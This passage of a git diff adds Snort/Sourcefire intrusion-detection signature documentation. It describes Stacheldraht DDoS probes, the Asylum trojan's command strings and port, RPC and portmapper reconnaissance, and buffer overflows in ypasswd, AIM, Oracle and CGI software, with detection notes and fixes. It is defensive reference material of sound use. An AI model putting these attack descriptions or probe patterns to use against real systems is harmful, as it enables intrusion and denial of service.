+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/236.txt
@@ -0,0 +1,60 @@
+Rule:
+--
+Sid:
+236
+
+--
+Summary:
+This event is generated when a Stacheldraht handler probes for a Stacheldraht agent on the destination host.
+
+--
+Impact:
+Severe. This indicates that a Stacheldraht handler may exist on the source host and an agent may exist on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.A handler can discover if a particular host is a Stacheldraht agent by sending it an ICMP echo reply with an ICMP identification number of 668 and a string of "gesundheit!" in the payload.
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A handler may attempt to discover if the destination host is a Stacheldraht agent. A script named "gag" can be used to generate this communication for a defender or attacker to discover if a host is a Stacheldraht agent.
+
+--
+Ease of Attack:
+Simple.  The gag script is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS194
+
+--
--- /dev/null
+++ b/doc/signatures/2038.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2038
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2204.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2204
+
+--
+Summary:
+This event is generated when an attempt is made to access ezadmin.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 version 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezadmin.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezadmin.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
--- /dev/null
+++ b/doc/signatures/577.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+577
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) bootparam is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port bootparam is using.  Attackers can also learn what versions of the bootparam protocol are accepted by bootparam.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as bootparam run.  The bootparam RPC service is used by some diskless workstations to query a server to discover the information required to boot.  The client will issue a bootparam whoami request to the server.  The server response will include the Network Information Systems (NIS) domain name.  If no authentication is used, an attacker can send a bootparam request.  The domain name provides valuable information that can be used to break into an NIS environment.  
+
+--
+Affected Systems:
+Any host running bootparam with no authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where bootparam runs.  This may be a precursor to accessing bootparam.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access bootparam, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for bootparam, not probes of the bootparam service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the bootparam service itself. An attacker may attempt to go directly to the bootparam port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0647
+
+Arachnids 
+http://www.whitehats.com/info/IDS16
+
+
+--
--- /dev/null
+++ b/doc/signatures/1584.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1584
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2718.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2718
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rectify
+. This procedure is included in
+dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1371.txt
@@ -0,0 +1,49 @@
+Rule:
+
+--
+Sid:
+1371
+
+--
+Summary:
+This event is generated when an attempt is made to access the message of the day (motd) via the web
+
+--
+Impact:
+Attempt to gain information about the system on a webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the system hosting a webserver. The motd is used to display system information on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/etc/motd' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This file may also be requested on a command line should the attacker gain access to the machine. Making the file read only by the superuser on the system will disallow viewing of the file by other users.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2029.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2029
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/3013.txt
@@ -0,0 +1,85 @@
+Rule: 
+
+--
+Sid: 
+3013
+-- 
+Summary: 
+This event is generated when an attacker attempts to connect to the
+victim using the Asylum 0.1 trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to the
+system, enabling him to upload and execute files on the computer and
+reboot it at will, resulting in a full compromise of the victim's computer. 
+
+--
+Detailed Information:
+When executed, Asylum 0.1 opens up its assigned port (default is 23432)
+for communication with the attacker. Asylum 0.1 has four functions:
+Upload File, Open File, Reboot Computer, and Remove Server. 
+
+Upload File: Look for traffic on port 23432 containing UPL followed by a file location.
+Open File: Look for traffic on port 23432 containing RUN followed by a file location.
+Reboot: Look for the string "RBT" on port 23432.
+Remove Server: Look for the string "DIE" on port 23432.
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 23432), and presses the connect button and he has access to
+the computer.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action:
+
+Delete the System Administration key (if found) in 
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices or
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
+
+Open the system.ini and (if found) replace shell=Explore.exe win32cmp.exe to shell=explore.exe
+
+Open the win.ini and (if found) delete load=c:\windows\wincmp32.exe or run=c:\windows\wincmp32.exe
+
+Find and delete the Asylum 0.1 trojan server file, usually called wincmp32.exe.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/A/Asylum.asp
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/asylum/01/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2500.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2500
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2152.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a script not normally used in a production environment. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a test script (test.php) that would not normally be used in a production environment.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+In applications such as Horde or IMP, the test.php script may reveal valuable server information to the attacker.
+
+--
+Affected Systems:
+Any host using php applications such as Horde or IMP.
+
+Other php applications may use a file named test.php also.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If the script test.php exists and is normally used, this rule will generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/587.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+587
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) statd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port statd is using.  Attackers can also learn what versions of the statd protocol are accepted by statd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as statd run.  The statd RPC service manages Network File System (NFS) locks for exclusive access to a remote file. Multiple vulnerabilities that have allowed execution of arbitrary commands as root have been associated with statd.
+
+--
+Affected Systems:
+Multiple; refer to your vendor for specific information.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd runs.  This may be a precursor to accessing statd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access statd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for statd, not probes of the statd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the statd service itself. An attacker may attempt to go directly to the statd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS15
+
+
+--
--- /dev/null
+++ b/doc/signatures/687.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-2002-04.html
+
+--
--- /dev/null
+++ b/doc/signatures/1183.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1183
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2386.txt
@@ -0,0 +1,74 @@
+Rule:  
+
+--
+Sid:
+2386
+
+--
+Summary:
+This event is generated when an attempt is made to scan for a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library using 
+Nessus.
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+This event indicates a possible attempt to enumerate vulnerable hosts using 
+Nessus.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1482.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1482
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2540.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2540
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/627.txt
@@ -0,0 +1,64 @@
+Rule:  
+ 
+--
+Sid:
+627
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. Having SYN, FIN, URG and 
+reserve bits 1 and 2 set at the same time is abnormal.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by system and network administrators.
+Other vulnerability scanners may display the same behavior.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+TCP packets with SYN, FIN, URG and reserved bits 1 and 2 set at the same
+time are abnormal, use a packet filtering firewall to block them.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS150
+
+--
--- /dev/null
+++ b/doc/signatures/1393.txt
@@ -0,0 +1,71 @@
+Nigel removed w00.w00 reference - no longer active
+
+Rule:
+
+--
+Sid:
+1393
+
+--
+Summary:
+This event is generated when exploit traffic is observed that attempts to cause a buffer overflow in a Windows host running America Online (AOL) Instant Messenger (AIM).
+
+--
+Impact:
+Attempted user level access.  A successful attack may permit the execution of arbitrary code with the privileges of the user running AIM.
+
+--
+Detailed Information:
+AIM can be used for message and file exchanges as well as to play games with other AIM users.  A buffer overflow exists in AIM game request code (AddGame) that may permit the execution of arbitrary code on a Windows client AIM host with the privileges of the user running AIM.  
+
+--
+
+Affected Systems:
+Windows hosts running AIM 4.3 - 4.8.2616.
+
+--
+Attack Scenarios:
+An attacker may craft a malformed AIM game request causing a buffer overflow, and potentially permitting the execution of arbitrary code with the privileges of the user running AIM. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This event is trigger when known exploit code is run.  It may be possible that other exploit code exists that will not trigger this event.
+
+--
+Corrective Action:
+
+ -Workstation:
+   Upgrade to version 2001B Beta v5.18 Build #3659 or later.
+
+    or
+
+   Go to Preferences in AIM -> Privacy ->
+   In "Who can contact me" check "Allow only users on my Buddy List".
+
+ -Network:
+   Block AIM traffic into and out of your network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0005
+
+Bugtraq:
+http://www.securityfocus.com/bid/3769
+
+--
--- /dev/null
+++ b/doc/signatures/2611.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2611
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can create a database link and supply it an overly
+long string to the "USING" parameter of the "CREATE DATABASE LINK"
+command. This long value is stored for later use. When subsequently
+accessed via the link, a buffer overflow can occur.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i and earlier
+
+--
+Attack Scenarios:
+An attacker can create a database link and supply it an overly long
+"USING" value.  The result could permit the attacker to gain escalated
+privileges and run code of their choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
